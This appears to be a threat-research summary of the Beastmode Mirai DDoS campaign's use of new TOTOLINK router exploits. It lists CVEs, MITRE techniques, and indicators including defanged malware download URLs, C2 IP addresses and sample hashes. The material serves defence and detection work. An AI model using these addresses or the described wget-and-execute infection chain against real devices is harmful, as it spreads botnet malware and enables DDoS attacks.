Threat Research

Fresh TOTOLINK Vulnerabilities Picked Up by Beastmode Mirai Campaign

Securonix

Beastmode, a Mirai-based DDoS campaign, rapidly expanded its exploit arsenal in early 2022 by adding multiple TOTOLINK-focused vulnerabilities, enabling broader device infections and botnet growth. The campaign leverages publicly released exploit code, uses shell scripts downloaded via wget, and culminates in a suite of DDoS capabilities; users are urged to update affected firmware. #Beastmode #Totolink

Keypoints

  • Beastmode (aka B3astmode) added five new exploits within a month in early 2022, with three targeting TOTOLINK router models.
  • Threat actors rapidly adopted newly released exploit code (often within a week of GitHub publication) to infect more devices before patches appeared.
  • TOTOLINK updated firmware; users are strongly advised to apply updates to mitigate risk.
  • Exploited CVEs include CVE-2022-26210; CVE-2022-25075/25076/25077/25078/25079/25080/25081/25082/25083/25084, plus other older CVEs (e.g., CVE-2021-45382, CVE-2021-4045, CVE-2017-17215, CVE-2016-5674).
  • The campaign uses wget to download and execute shell scripts (e.g., ddns.sh) to install Beastmode on breached devices.
  • Beastmode botnets can execute a variety of DDoS attacks (e.g., attack_app_http, attack_tcp_syn, attack_udp_plain, etc.).
  • Fortinet protections include IPS signatures, web filtering for C2s, and AV detection as Linux/Mirai, helping to block these threats.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Five new exploits were added within a month, with three targeting various models of TOTOLINK routers. β€œBy rapidly adopting newly released exploit code, threat actors can potentially infect vulnerable devices and expand their botnets before patches are applied to fix these vulnerabilities.”
  • [T1105] Ingress Tool Transfer – This usually involves using the wget command to download shell scripts to infect the device with Beastmode.
  • [T1059.004] Unix Shell – The shell scripts downloaded are then executed, with the Beastmode binary saved as β€œddns” and run with the β€œddns.exploit” parameter.
  • [T1071.001] Web Protocols – The campaign uses an HTTP User-Agent header β€œb3astmode” within exploit requests, indicating HTTP-based C2/command actions.
  • [T1499] Denial of Service – The botnet can be used to perform a variety of DDoS attacks such as attack_app_http, attack_tcp_syn, attack_udp_plain, etc.

Indicators of Compromise

  • [URL] Download URLs – http://195.133.18[.]119/beastmode/b3astmode.86_64, http://195.133.18[.]119/beastmode/b3astmode.arm4
  • [URL] Download URLs – http://195.133.18[.]119/beastmode/b3astmode.arm5, http://195.133.18[.]119/beastmode/b3astmode.arm6
  • [IP] C2 IPs – 195.133.18[.]119, 136.144.41[.]69
  • [SHA256] Samples – 04a50c409a30cdd53036c490534ee7859b828f2b9a9dd779c6b0112b88b74708, 0ca74024f5b389fcfa5ee545c8a7842316c78fc53d4a9e94c34d556459a58877
  • [SHA256] Samples – 0d442f4327ddd254dbb2a9a243d9317313e44d4f6a6078ea1139ddd945c3f272, 14726d501dd489e8228af9580b4369819efb3101f6128df1a1ab0fcc8d96e797
  • [SHA256] Samples – 18cefe4333f5f1165c1275c956c8ae717d53818b2c5b2372144fb87d6687f0d8, 36a85f2704f77d7e11976541f3d77774109461e1baae984beb83064c2e34239a

Read more: https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign